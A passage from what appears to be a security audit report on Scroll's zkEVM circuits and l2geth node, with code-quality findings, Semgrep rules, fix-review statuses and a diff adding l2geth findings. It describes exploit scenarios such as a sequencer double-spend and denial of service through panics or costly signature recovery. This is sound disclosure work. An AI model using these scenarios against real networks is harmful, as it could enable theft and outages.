of “intermediate value” columns, as shown in figure 10.1. intermediate_values: [AdviceColumn; 10], // can be 4? second_phase_intermediate_values: [SecondPhaseAdviceColumn; 10], // 4? Figure 10.1: mpt-circuit/src/gadgets/mpt_update.rs#65–66 These columns are used as general-use cells for values that are only conditionally needed in a given row, reducing the total number of columns needed. For example, figure 10.2 shows that intermediate_values[0] is used for the address value in rows that match SegmentType::Start, but as shown in figure 10.3, rows representing the SegmentType::AccountLeaf3 state of a Keccak code-hash proof use that same slot for the old_high value. let address = self.intermediate_values[0].current() * is_start(); Figure 10.2: mpt-circuit/src/gadgets/mpt_update.rs#78 SegmentType::AccountLeaf3 => { cb.assert_equal("direction is 1", config.direction.current(), Query::one()); let [old_high, old_low, new_high, new_low, ..] = config.intermediate_values; Figure 10.3: mpt-circuit/src/gadgets/mpt_update.rs#1632–1635 In some cases, cells of intermediate_values are used starting from the end of the intermediate_values column, such as the other_key_hash and other_leaf_data_hash values in PathType::ExtensionOld rows, as illustrated in figure 10.4. let [.., key_equals_other_key, new_hash_is_zero] = config.is_zero_gadgets; let [.., other_key_hash, other_leaf_data_hash] = config.intermediate_values; nonexistence_proof::configure( cb, config.new_value, config.key, config.other_key, key_equals_other_key, config.new_hash, new_hash_is_zero, other_key_hash, other_leaf_data_hash, poseidon, ); Figure 10.4: mpt-circuit/src/gadgets/mpt_update.rs#1036–1049 Although we did not find any mistakes such as misused columns, this pattern is ad hoc and error-prone, and evaluating the correctness of this pattern requires checking every individual use of intermediate_values. Recommendations Short term, document the assignment of all intermediate_values columns in each relevant case. Long term, consider using Rust types to express the different uses of the various intermediate_values columns. For example, one could define an IntermediateValues enum, with cases like StartRow { address: &AdviceColumn } and ExtensionOld { other_key_hash: &AdviceColumn, other_leaf_data_hash: &AdviceColumn }, and a single function fn parse_intermediate_values(segment_type: SegmentType, path_type: PathType, columns: &[AdviceColumn; 10]) -> IntermediateValues. Then, the correct assignment and use of intermediate_values columns can be audited only by checking parse_intermediate_values. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category Description Access Controls Insufficient authorization or assessment of rights Auditing and Logging Insufficient auditing of actions or logging of problems Authentication Improper identification of users Configuration Misconfigured servers, devices, or software components Cryptography A breach of system confidentiality or integrity Data Exposure Exposure of sensitive information Data Validation Improper reliance on the structure or values of data Denial of Service A system failure with an availability impact Error Reporting Insecure or insufficient reporting of error conditions Patching Use of an outdated software package or library Session Management Improper identification of authenticated users Testing Timing Insufficient test methodology or test coverage Race conditions or other order-of-operations flaws Undefined Behavior Undefined behavior triggered within the system Severity Levels Severity Description Informational The issue does not pose an immediate risk but is relevant to security best practices. Undetermined The extent of the risk was not determined during this engagement. Low The risk is small or is not one the client has indicated is important. Medium High User information is at risk; exploitation could pose reputational, legal, or moderate financial risks. The flaw could affect numerous users and have serious reputational, legal, or financial implications. Difficulty Levels Difficulty Description Undetermined The difficulty of exploitation was not determined during this engagement. Low Medium High The flaw is well known; public tools for its exploitation exist or can be scripted. An attacker must write an exploit or will need in-depth knowledge of the system. An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue. B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document. Code Maturity Categories Category Description Arithmetic The proper use of mathematical operations and semantics Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution Documentation The presence of comprehensive and readable codebase documentation Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage Rating Criteria Rating Strong Description No issues were found, and the system exceeds industry standards. Satisfactory Minor issues were found, but the system is compliant with best practices. Moderate Some issues that may affect system safety were found. Weak Many issues that affect system safety were found. Missing A required component is missing, significantly affecting system safety. Not Applicable The category is not applicable to this review. Not Considered The category was not considered in this review. Further Investigation Required Further investigation is required to reach a meaningful conclusion. C. Code Quality Findings We identified the following code quality issues through manual and automatic code review. ● Allow the dead_code lint and fix all issues. The dead_code lint is currently disabled; it should be enabled to allow developers to quickly detect unused functions and variables. ● Several constraints have meaningless labels. Constraint labels are useful for explaining the intention behind constraints; using meaningless labels hinders code readability. region .assign_fixed( || "asdfasdfawe", self.0, Figure C.1: mpt-circuit/src/constraint_builder/column.rs#52–55 cb.assert_equal("???????", rlc.current(), byte.current()); }); cb.condition(!index_is_zero.current(), |cb| { cb.assert_equal( "value can only change when index = 0", value.current(), value.previous(), ); cb.assert_equal( "differences_are_zero_so_far = difference == 0 && differences_are_zero_so_far.previous() when index != 0", differences_are_zero_so_far.current().into(), differences_are_zero_so_far .previous() .and(difference_is_zero.previous()) .into(), ); cb.assert_equal( "???", Figure C.2: mpt-circuit/src/gadgets/canonical_representation.rs#72–89 ● There are duplicate and unused functions in the codebase. The types.rs and util.rs files have several duplicate functions: fr, hash, storage_key_hash, split_word, hi_lo, and Bit. ● The following constraint label was incorrectly copy-pasted. cb.assert_equal( "old_value does not change", new_value.current(), new_value.previous(), ); Figure C.3: mpt-circuit/src/gadgets/mpt_update.rs#163–167 ● There are redundant constraints in empty storage/account constraints. The configure_empty_storage and configure_empty_account functions require the new_value and old_value fields to be 0 but also constrain them to be equal. cb.assert_zero( "old value is 0 for empty storage", config.old_value.current(), ); cb.assert_zero( "new value is 0 for empty storage", config.new_value.current(), ); ... cb.assert_equal( "old value = new value for empty account proof", config.old_value.current(), config.new_value.current(), ); Figure C.4: mpt-circuit/src/gadgets/mpt_update.rs#1785–1811 cb.assert_zero("old value is 0", config.old_value.current()); cb.assert_zero("new value is 0", config.new_value.current()); ... cb.assert_equal( "old value = new value for empty account proof", config.old_value.current(), config.new_value.current(), ); Figure C.5: mpt-circuit/src/gadgets/mpt_update.rs#1869–1893 ● The following constraint label is imprecise. The label should read rwc_inc_left[1] == rwc_inc_left[0] - rwc_diff, or 0 at the end to match the code. // Decrement rwc_inc_left for the next row, when an RW operation happens. let rwc_diff = is_rw_type.expr() * is_word_end.expr(); let new_value = meta.query_advice(rwc_inc_left, CURRENT) - rwc_diff; // At the end, it must reach 0. let update_or_finish = select::expr( not::expr(is_last.expr()), meta.query_advice(rwc_inc_left, NEXT_ROW), 0.expr(), ); cb.require_equal( "rwc_inc_left[2] == rwc_inc_left[0] - rwc_diff, or 0 at the end", new_value, update_or_finish, ); Figure C.6: src/copy_circuit/copy_gadgets.rs#524–537 ● The IsZeroGadget assign function does not assign the witness value. pub fn assign>( &self, region: &mut Region<'_, F>, offset: usize, value: T, ) where >::Error: Debug, { } self.inverse_or_zero.assign( region, offset, value.try_into().unwrap().invert().unwrap_or(F::zero()), ); // TODO: get rid of assign method in favor of it. pub fn assign_value_and_inverse>( &self, region: &mut Region<'_, F>, offset: usize, value: T, ) where >::Error: Debug, { } self.value.assign(region, offset, value); self.assign(region, offset, value); Figure C.7: mpt-circuit/src/gadgets/is_zero.rs#20–46 ● The OneHot assign function should ensure that no more than one item is assigned. pub fn assign(&self, region: &mut Region<'_, F>, offset: usize, value: T) { if let Some(c) = self.columns.get(&value) { c.assign(region, offset, true) } } Figure C.8: mpt-circuit/src/gadgets/one_hot.rs#31– ● There is a redundant condition in the configure_empty_account function. The function could just match SegmentType::Start. SegmentType::Start | SegmentType::AccountTrie => { let is_final_segment = config.segment_type.next_matches(&[SegmentType::Start]); cb.condition(is_final_segment, |cb| { Figure C.9: mpt-circuit/src/gadgets/mpt_update.rs#1878–1880 ● There is a redundant .and() call in the MptUpdateConfig configure function. The cb.every_row_selector() function returns the first condition in the condition stack, so this condition is equivalent to is_start. cb.condition(is_start.clone().and(cb.every_row_selector()), |cb| { Figure C.10: mpt-circuit/src/gadgets/mpt_update.rs#124 ● The rw_counter constraints could be consolidated. Constraining rw_counter requires constraining the tag to Memory or TxLog and constraining the Padding to +0. These constraints are implemented in different locations in the codebase, making the code harder to understand. let is_rw_type = meta.query_advice(is_memory, CURRENT) + is_tx_log.expr(); Figure C.11: src/copy_circuit.rs#340–341 // Decrement rwc_inc_left for the next row, when an RW operation happens. let rwc_diff = is_rw_type.expr() * is_word_end.expr(); Figure C.12: copy_circuit/copy_gadgets.rs#L525 ● The following constraint label is imprecise. The label should read assign real_bytes_left {}. // real_bytes_left region.assign_advice( || format!("assign bytes_left {}", *offset), self.copy_table.real_bytes_left, *offset, || Value::known(F::zero()), )?; Figure C.13: src/copy_circuit.rs#776– D. Automated Analysis Tool Configuration As part of this assessment, we used the tools described below to perform automated testing of the codebase. D.1. Semgrep We used the static analyzer Semgrep to search for risky API patterns and weaknesses in the source code repository. For this purpose, we wrote rules specifically targeting the ConstraintBuilder APIs and the ExecutionGadget trait. semgrep --metrics=off --sarif --config=custom_rule_path.yml Figure D.1: The invocation command used to run Semgrep for each custom rule Duplicate Constraints The presence of duplicate constraints, with potentially different labels, indicates either a redundant constraint that can be removed or an intended constraint that was not correctly updated. This pattern was written to find variants of finding TOB-SCROLL2-6, but no other instances of it were found in the codebase. However, this pattern should be added as a CI/CD Semgrep rule to prevent a similar issue from recurring in the codebase. rules: - id: repeated-constraints message: "Found redundant or incorrectly updated constraint" languages: [rust] severity: ERROR patterns: - pattern: | cb.$FUNC($LABEL1, $LEFT, $RIGHT); ... cb.$FUNC($LABEL2, $LEFT, $RIGHT); Figure D.2: The repeated-constraints Semgrep rule Constraints with Repeated Labels The presence of a repeated label could indicate a copy-pasted label that should be updated. rules: - id: constraints-with-repeated-labels message: "Found constraints with the same label" languages: [rust] severity: ERROR patterns: - pattern: | cb.$FUNC("$LABEL", ...); ... cb.$FUNC("$LABEL", ...); Figure D.3: The repeated-labels Semgrep rule D.2. cargo llvm-cov cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command in the MPT codebase to generate the coverage report presented in the Automated Testing section. D.3. cargo edit cargo-edit allows developers to quickly find outdated Rust crates. The tool can be installed with the cargo install cargo-edit command and the cargo upgrade --incompatible --dry-run command can be used to find outdated crates. D.4. Clippy The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool with the pedantic ruleset. cargo clippy --workspace -- -W clippy::pedantic Figure D.4: The invocation command used to run Clippy in the codebase E. Fix Review Results When undertaking a fix review, reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system. From September 25 to September 29, 2023, reviewed the fixes and mitigations implemented by the Scroll team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. Scroll provided PRs with fixes for all high-severity findings and for the informational-severity finding TOB-SCROLL2-7. Scroll did not submit fixes for the remaining informational-severity findings. In summary, of the 10 issues described in this report, Scroll has resolved three issues and has partially resolved one issue. Scroll indicated that it does not intend to fix finding TOB-SCROLL2-2, so its status is unresolved. No fix PRs were provided for the remaining five issues, so their fix statuses are undetermined. For additional information, please see the Detailed Fix Review Results below. ID Title Status 7 8 9 The Copy circuit does not totally enforce the tag values Partially Resolved The “invalid creation” error handling circuit is unconstrained Resolved The OneHot primitive allows more than one value at once Resolved Detailed Fix Review Results TOB-SCROLL2-1: PoseidonLookup is not implemented Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-SCROLL2-2: IsZeroGadget does not constrain the inverse witness when the value is zero Unresolved. The Scroll team has indicated that it does not intend to fix this issue. TOB-SCROLL2-3: The MPT nonexistence proof gadget is missing constraints specified in the documentation Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-SCROLL2-4: Discrepancies between the MPT circuit specification and implementation Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-SCROLL2-5: Redundant lookups in the Word RLC circuit Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. TOB-SCROLL2-6: The NonceChanged configuration circuit does not constrain the new value nonce value Resolved in PR #73. The two conditional constraints that referred to old_value instead of new_value have been factored out into a single unconditional constraint referring to new_value, and the ExtensionOld case has been removed entirely in favor of a blanket assertion forbidding that case of configure_nonce. TOB-SCROLL2-7: The Copy circuit does not totally enforce the tag values Partially resolved in PR #809. Several cases of the CopyDataType tag have been removed, and an assertion has been added to document that the Padding tag value is internal only. We did not fully evaluate whether this prevents tag values outside the expected range. TOB-SCROLL2-8: The “invalid creation” error handling circuit is unconstrained Resolved in PR #751. The MemoryMask gadget is used to extract the correct byte from the word at offset and to constrain it to equal 0xef. TOB-SCROLL2-9: The OneHot primitive allows more than one value at once Resolved in PR #69. Each binary column value v is constrained by enforcing 1 - v.or(!v) == 0. It is not immediately obvious that this constraint suffices, but it is equivalent to 𝑣(1 − 𝑣) = 0 by the following reasoning: 1 - v.or(!v) == 1 - !((!v).and(!!v) == 1 - (1 - ((!v)*(!!v))) … … == ((1-v)*(1-(1-v))) == (1-v)*v In addition, another related issue with the OneHot primitive, which was not discovered during the initial review engagement, was fixed in PR #68. The related problem was a typo causing OneHot::previous to return the result of the current row rather than the previous row. Its exploit scenario would be effectively the same as the one described in finding TOB-SCROLL2-9. The Scroll team fixed this by replacing the value BinaryColumn::current with BinaryColumn::previous. TOB-SCROLL2-10: Intermediate columns are not explicit Undetermined. No fix was provided for this issue, so we do not know whether this issue has been addressed. F. Fix Review Status Categories The following table describes the statuses used to indicate whether an issue has been sufficiently addressed. Fix Status Status Description Undetermined The status of the issue was not determined during this engagement. Unresolved The issue persists and has not been resolved. Partially Resolved The issue persists but has been partially resolved. Resolved The issue has been sufficiently resolved. diff --git a/findings_newupdate/tob/2023-08-scrollL2geth-initial-securityreview.txt b/findings_newupdate/tob/2023-08-scrollL2geth-initial-securityreview.txt new file mode 100644 index 0000000..cb63cd0 --- /dev/null +++ b/findings_newupdate/tob/2023-08-scrollL2geth-initial-securityreview.txt @@ -0,0 +1,17 @@ +2. Multiple instances of unchecked errors Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-L2GETH-2 Targets: trie/zkproof/writer.go, trie/sync.go, trie/proof.go, trie/committer.go, trie/database.go Description There are multiple instances of unchecked errors in the l2geth codebase, which could lead to undefined behavior when errors are raised. One such unhandled error is shown in figure 2.1. A comprehensive list of unchecked errors is provided in appendix C. if len(requests) == 0 && req.deps == 0 { s.commit(req) } else { Figure 2.1: The Sync.commit() function returns an error that is unhandled, which could lead to invalid commitments or a frozen chain. (go-ethereum/trie/sync.go#296–298) Unchecked errors also make the system vulnerable to denial-of-service attacks; they could allow attackers to trigger nil dereference panics in the sequencer node. Exploit Scenario An attacker identifies a way to cause a zkTrie commitment to fail, allowing invalid data to be silently committed by the sequencer. Recommendations Short term, add error checks to all functions that can emit Go errors. Long term, add the tools errcheck and ineffassign to l2geth’s build pipeline. These tools can be used to detect errors and prevent builds containing unchecked errors from being deployed. +3. Risk of double-spend attacks due to use of single-node Clique consensus without finality API Severity: Medium Difficulty: High Type: Undefined Behavior Finding ID: TOB-L2GETH-3 Target: N/A Description l2geth uses the proof-of-authority Clique consensus protocol, defined by EIP-255. This consensus type is not designed for single-node networks, and an attacker-controlled sequencer node may produce multiple conflicting forks of the chain to facilitate double-spend attacks. The severity of this finding is compounded by the fact that there is no API for an end user to determine whether their transaction has been finalized by L1, forcing L2 users to use ineffective block/time delays to determine finality. Clique consensus was originally designed as a replacement for proof-of-work consensus for Ethereum testnets. It uses the same fork choice rule as Ethereum’s proof-of-work consensus; the fork with the highest “difficulty” should be considered the canonical fork. Clique consensus does not use proof-of-work and cannot update block difficulty using the traditional calculation; instead, block difficulty may be one of two values: ● “1” if the block was mined by the designated signer for the block height ● “2” if the block was mined by a non-designated signer for the block height This means that in a network with only one authorized signer, all of the blocks and forks produced by the sequencer will have the same difficulty value, making it impossible for syncing nodes to determine which fork is canonical at the given block height. In a normal proof-of-work network, one of the proposed blocks will have a higher difficulty value, causing syncing nodes to re-organize and drop the block with the lower difficulty value. In a single-validator proof-of-authority network, neither block will be preferred, so each syncing node will simply prefer the first block they received. This finding is not unique to l2geth; it will be endemic to all L2 systems that have only one authorized sequencer. Exploit Scenario An attacker acquires control over l2geth’s centralized sequencer node. The attacker modifies the node to prove two forks: one fork containing a deposit transaction to a centralized exchange, and one fork with no such deposit transaction. The attacker publishes the first fork, and the centralized exchange picks up and processes the deposit transaction. The attacker continues to produce blocks on the second private fork. Once the exchange processes the deposit, the attacker stops generating blocks on the public fork, generates an extra block to make the private fork longer than the public fork, then publishes the private fork to cause a re-organization across syncing nodes. This attack must be completed before the sequencer is required to publish a proof to L1. Recommendations Short term, add API methods and documentation to ensure that bridges and centralized exchanges query only for transactions that have been proved and finalized on the L1 network. Long term, decentralize the sequencer in such a way that a majority of sequencers must collude in order to successfully execute a double-spend attack. This design should be accompanied by a slashing mechanism to penalize sequencers that sign conflicting blocks. +4. Improper use of panic Severity: Low Difficulty: Medium Type: Denial of Service Finding ID: TOB-L2GETH-4 Target: Various areas of the codebase Description l2geth overuses Go’s panic mechanism in lieu of Go’s built-in error propagation system, introducing opportunities for denial of service. Go has two primary methods through which errors can be reported or propagated up the call stack: the panic method and Go errors. The use of panic is not recommended, as it is unrecoverable: when an operation panics, the Go program is terminated and must be restarted. The use of panic creates a denial-of-service vector that is especially applicable to a centralized sequencer, as a restart of the sequencer would effectively halt the L2 network until the sequencer recovers. Some example uses of panic are presented in figures 4.1 to 4.3. These do not represent an exhaustive list of panic statements in the codebase, and the Scroll team should investigate each use of panic in its modified code to verify whether it truly represents an unrecoverable error. func sanityCheckByte32Key(b []byte) { if len(b) != 32 && len(b) != 20 { panic(fmt.Errorf("do not support length except for 120bit and 256bit now. data: %v len: %v", b, len(b))) } } Figure 4.1: The sanityCheckByte32Key function panics when a trie key does not match the expected size. This function may be called during the execution of certain RPC requests. (go-ethereum/trie/zk_trie.go#44–48) func (s *StateAccount) MarshalFields() ([]zkt.Byte32, uint32) { fields := make([]zkt.Byte32, 5) if s.Balance == nil { panic("StateAccount balance nil") } if !utils.CheckBigIntInField(s.Balance) { panic("StateAccount balance overflow") } if !utils.CheckBigIntInField(s.Root.Big()) { panic("StateAccount root overflow") } if !utils.CheckBigIntInField(new(big.Int).SetBytes(s.PoseidonCodeHash)) { panic("StateAccount poseidonCodeHash overflow") } Figure 4.2: The MarshalFields function panics when attempting to marshal an object that does not match certain requirements. This function may be called during the execution of certain RPC requests. (go-ethereum/core/types/state_account_marshalling.go#47–64) func (t *ProofTracer) MarkDeletion(key []byte) { if path, existed := t.emptyTermPaths[string(key)]; existed { // copy empty node terminated path for final scanning t.rawPaths[string(key)] = path } else if path, existed = t.rawPaths[string(key)]; existed { // sanity check leafNode := path[len(path)-1] if leafNode.Type != zktrie.NodeTypeLeaf { panic("all path recorded in proofTrace should be ended with leafNode") } Figure 4.3: The MarkDeletion function panics when the proof tracer contains a path that does not terminate in a leaf node. This function may be called when a syncing node attempts to process an invalid, malicious proof that an attacker has gossiped on the network. (go-ethereum/trie/zktrie_deletionproof.go#120–130) Exploit Scenario An attacker identifies an error path that terminates with a panic that can be triggered by a malformed RPC request or proof payload. The attacker leverages this issue to either disrupt the sequencer’s operation or prevent follower/syncing nodes from operating properly. Recommendations Short term, review all uses of panic that have been introduced by Scroll’s changes to go-ethereum. Ensure that these uses of panic truly represent unrecoverable errors, and if not, add error handling logic to recover from the errors. Long term, annotate all valid uses of panic with explanations for why the errors are unrecoverable and, if applicable, how to prevent the unrecoverable conditions from being triggered. l2geth’s code review process must also be updated to verify that this documentation exists for new uses of panic that are introduced later. +5. Risk of panic from nil dereference due to flawed error reporting in addressToKey Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-L2GETH-5 Target: trie/zkproof/writer.go Description The addressToKey function, shown in figure 5.1, returns a nil pointer instead of a Go error when an error is returned by the preImage.Hash() function, which will cause a nil dereference panic in the NewZkTrieProofWriter function, as shown in figure 5.2. If the error generated by preImage.Hash() is unrecoverable, the addressToKey function should panic instead of silently returning a nil pointer. func addressToKey(addr common.Address) *zkt.Hash { var preImage zkt.Byte32 copy(preImage[:], addr.Bytes()) h, err := preImage.Hash() if err != nil { log.Error("hash failure", "preImage", hexutil.Encode(preImage[:])) return nil } return zkt.NewHashFromBigInt(h) } Figure 5.1: The addressToKey function returns a nil pointer to zkt.Hash when an error is returned by preImage.Hash(). (go-ethereum/trie/zkproof/writer.go#31–41) func NewZkTrieProofWriter(storage *types.StorageTrace) (*zktrieProofWriter, error) { underlayerDb := memorydb.New() zkDb := trie.NewZktrieDatabase(underlayerDb) accounts := make(map[common.Address]*types.StateAccount) // resuming proof bytes to underlayerDb for addrs, proof := range storage.Proofs { if n := resumeProofs(proof, underlayerDb); n != nil { addr := common.HexToAddress(addrs) if n.Type == zktrie.NodeTypeEmpty { accounts[addr] = nil } else if acc, err := types.UnmarshalStateAccount(n.Data()); err == nil { if bytes.Equal(n.NodeKey[:], addressToKey(addr)[:]) { accounts[addr] = acc Figure 5.2: The addressToKey function is consumed by NewZkTrieProofWriter, which will attempt to dereference the nil pointer and generate a system panic. (go-ethereum/trie/zkproof/writer.go#152–167) Recommendations Short term, modify addressToKey so that it either returns an error that its calling functions can propagate or, if the error is unrecoverable, panics instead of returning a nil pointer. Long term, update Scroll’s code review and style guidelines to reflect that errors must be propagated by Go’s error system or must halt the program by using panic. +6. Risk of transaction pool admission denial of service Severity: Low Difficulty: Low Type: Denial of Service Finding ID: TOB-L2GETH-6 Target: core/tx_pool.go Description l2geth’s changes to the transaction pool include an ECDSA recovery operation at the beginning of the pool’s transaction validation logic, introducing a denial-of-service vector: an attacker could generate invalid transactions to exhaust the sequencer’s resources. l2geth adds an L1 fee that all L2 transactions must pay. To verify that an L2 transaction can afford the L1 fee, the transaction pool calls fees.VerifyFee(), as shown in figure 6.1. VerifyFee() performs an ECDSA recovery operation to determine the account that will pay the L1 fee, as shown in figure 6.2. ECDSA key recovery is an expensive operation that should be executed as late in the transaction validation process as possible in order to reduce the impact of denial-of-service attacks. func (pool *TxPool) add(tx *types.Transaction, local bool) (replaced bool, err error) { // If the transaction is already known, discard it hash := tx.Hash() if pool.all.Get(hash) != nil { log.Trace("Discarding already known transaction", "hash", hash) knownTxMeter.Mark(1) return false, ErrAlreadyKnown } // Make the local flag. If it's from local source or it's from the network but // the sender is marked as local previously, treat it as the local transaction. isLocal := local || pool.locals.containsTx(tx) if pool.chainconfig.Scroll.FeeVaultEnabled() { if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil { Figure 6.1: TxPool.add() calls fees.VerifyFee() before any other transaction validators are called. (go-ethereum/core/tx_pool.go#684–697) func VerifyFee(signer types.Signer, tx *types.Transaction, state StateDB) error { from, err := types.Sender(signer, tx) if err != nil { return errors.New("invalid transaction: invalid sender") } Figure 6.2: VerifyFee() initiates an ECDSA recovery operation via types.Sender(). (go-ethereum/rollup/fees/rollup_fee.go#198–202) Exploit Scenario An attacker generates a denial-of-service attack against the sequencer by submitting extraordinarily large transactions. Because ECDSA recovery is a CPU-intensive operation and is executed before the transaction size is checked, the attacker is able to exhaust the memory resources of the sequencer. Recommendations Short term, modify the code to check for L1 fees in the TxPool.validateTx() function immediately after that function calls types.Sender(). This will ensure that other, less expensive-to-check validations are performed before the ECDSA signature is recovered. Long term, exercise caution when making changes to code paths that validate information received from public sources or gossip. For changes to the transaction pool, a good general rule of thumb is to validate transaction criteria in the following order: 1. Simple, in-memory criteria that do not require disk reads or data manipulation 2. Criteria that require simple, in-memory manipulations of the data such as checks of the transaction size 3. Criteria that require an in-memory state trie to be checked 4. ECDSA recovery operations 5. Criteria that require an on-disk state trie to be checked However, note that sometimes these criteria must be checked out of order; for example, the ECDSA recovery operation to identify the origin account may need to be performed before the state trie is checked to determine whether the account can afford the transaction. +1. Transaction pool fails to drop transactions that cannot aord L1 fees Severity: Informational Difficulty: Low Type: Data Validation Finding ID: TOB-L2GETH-1 Target: core/types/transaction.go Description l2geth defines two fees that must be paid for L2 transactions: an L2 fee and an L1 fee. However, the code fails to account for L1 fees; as a result, transactions that cannot afford the combined L1 and L2 fees may be included in a block rather than demoted, as intended. The transaction.go file defines a Cost() function that returns the amount of ether that a transaction consumes, as shown in figure 1.1. The current implementation of Cost() does not account for L1 fees, causing other parts of the codebase to misjudge the balance requirements to execute a transaction. The correct implementation of Cost() should match the implementation of VerifyFee(), which correctly checks for L1 fees. // Cost returns gas * gasPrice + value. func (tx *Transaction) Cost() *big.Int { total := new(big.Int).Mul(tx.GasPrice(), new(big.Int).SetUint64(tx.Gas())) total.Add(total, tx.Value()) return total } Figure 1.1: The Cost() function does not include L1 fees in its calculation. (go-ethereum/core/types/transaction.go#318–323) Most notably, Cost() is consumed by the tx_list.Filter() function, which is used to prune un-executable transactions (transactions that cannot afford the fees), as shown in figure 1.2. The failure to account for L1 fees in Cost() could cause tx_list.Filter() to fail to demote such transactions, causing them to be incorrectly included in the block. func (l *txList) Filter(costLimit *big.Int, gasLimit uint64) (types.Transactions, types.Transactions) { // If all transactions are below the threshold, short circuit if l.costcap.Cmp(costLimit) <= 0 && l.gascap <= gasLimit { return nil, nil } l.costcap = new(big.Int).Set(costLimit) // Lower the caps to the thresholds l.gascap = gasLimit // Filter out all the transactions above the account's funds removed := l.txs.Filter(func(tx *types.Transaction) bool { return tx.Gas() > gasLimit || tx.Cost().Cmp(costLimit) > 0 }) Figure 1.2: Filter() uses Cost() to determine which transactions to demote. (go-ethereum/core/tx_list.go#332–343) Exploit Scenario A user creates an L2 transaction that can just barely afford the L1 and L2 fees in the next upcoming block. Their transaction is delayed due to full blocks and is included in a future block in which the L1 fees have risen. Their transaction reverts due to the increased L1 fees instead of being ejected from the transaction pool. Recommendations Short term, refactor the Cost() function to account for L1 fees, as is done in the VerifyFee() function; alternatively, have the transaction list structure use VerifyFee() or a similar function instead of Cost(). Long term, add additional tests to verify complex state transitions such as a transaction becoming un-executable due to changes in L1 fees. +2. Multiple instances of unchecked errors Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-L2GETH-2 Targets: trie/zkproof/writer.go, trie/sync.go, trie/proof.go, trie/committer.go, trie/database.go Description There are multiple instances of unchecked errors in the l2geth codebase, which could lead to undefined behavior when errors are raised. One such unhandled error is shown in figure 2.1. A comprehensive list of unchecked errors is provided in appendix C. if len(requests) == 0 && req.deps == 0 { s.commit(req) } else { Figure 2.1: The Sync.commit() function returns an error that is unhandled, which could lead to invalid commitments or a frozen chain. (go-ethereum/trie/sync.go#296–298) Unchecked errors also make the system vulnerable to denial-of-service attacks; they could allow attackers to trigger nil dereference panics in the sequencer node. Exploit Scenario An attacker identifies a way to cause a zkTrie commitment to fail, allowing invalid data to be silently committed by the sequencer. Recommendations Short term, add error checks to all functions that can emit Go errors. Long term, add the tools errcheck and ineffassign to l2geth’s build pipeline. These tools can be used to detect errors and prevent builds containing unchecked errors from being deployed. +3. Risk of double-spend attacks due to use of single-node Clique consensus without finality API Severity: Medium Difficulty: High Type: Undefined Behavior Finding ID: TOB-L2GETH-3 Target: N/A Description l2geth uses the proof-of-authority Clique consensus protocol, defined by EIP-255. This consensus type is not designed for single-node networks, and an attacker-controlled sequencer node may produce multiple conflicting forks of the chain to facilitate double-spend attacks. The severity of this finding is compounded by the fact that there is no API for an end user to determine whether their transaction has been finalized by L1, forcing L2 users to use ineffective block/time delays to determine finality. Clique consensus was originally designed as a replacement for proof-of-work consensus for Ethereum testnets. It uses the same fork choice rule as Ethereum’s proof-of-work consensus; the fork with the highest “difficulty” should be considered the canonical fork. Clique consensus does not use proof-of-work and cannot update block difficulty using the traditional calculation; instead, block difficulty may be one of two values: ● “1” if the block was mined by the designated signer for the block height ● “2” if the block was mined by a non-designated signer for the block height This means that in a network with only one authorized signer, all of the blocks and forks produced by the sequencer will have the same difficulty value, making it impossible for syncing nodes to determine which fork is canonical at the given block height. In a normal proof-of-work network, one of the proposed blocks will have a higher difficulty value, causing syncing nodes to re-organize and drop the block with the lower difficulty value. In a single-validator proof-of-authority network, neither block will be preferred, so each syncing node will simply prefer the first block they received. This finding is not unique to l2geth; it will be endemic to all L2 systems that have only one authorized sequencer. Exploit Scenario An attacker acquires control over l2geth’s centralized sequencer node. The attacker modifies the node to prove two forks: one fork containing a deposit transaction to a centralized exchange, and one fork with no such deposit transaction. The attacker publishes the first fork, and the centralized exchange picks up and processes the deposit transaction. The attacker continues to produce blocks on the second private fork. Once the exchange processes the deposit, the attacker stops generating blocks on the public fork, generates an extra block to make the private fork longer than the public fork, then publishes the private fork to cause a re-organization across syncing nodes. This attack must be completed before the sequencer is required to publish a proof to L1. Recommendations Short term, add API methods and documentation to ensure that bridges and centralized exchanges query only for transactions that have been proved and finalized on the L1 network. Long term, decentralize the sequencer in such a way that a majority of sequencers must collude in order to successfully execute a double-spend attack. This design should be accompanied by a slashing mechanism to penalize sequencers that sign conflicting blocks. +4. Improper use of panic Severity: Low Difficulty: Medium Type: Denial of Service Finding ID: TOB-L2GETH-4 Target: Various areas of the codebase Description l2geth overuses Go’s panic mechanism in lieu of Go’s built-in error propagation system, introducing opportunities for denial of service. Go has two primary methods through which errors can be reported or propagated up the call stack: the panic method and Go errors. The use of panic is not recommended, as it is unrecoverable: when an operation panics, the Go program is terminated and must be restarted. The use of panic creates a denial-of-service vector that is especially applicable to a centralized sequencer, as a restart of the sequencer would effectively halt the L2 network until the sequencer recovers. Some example uses of panic are presented in figures 4.1 to 4.3. These do not represent an exhaustive list of panic statements in the codebase, and the Scroll team should investigate each use of panic in its modified code to verify whether it truly represents an unrecoverable error. func sanityCheckByte32Key(b []byte) { if len(b) != 32 && len(b) != 20 { panic(fmt.Errorf("do not support length except for 120bit and 256bit now. data: %v len: %v", b, len(b))) } } Figure 4.1: The sanityCheckByte32Key function panics when a trie key does not match the expected size. This function may be called during the execution of certain 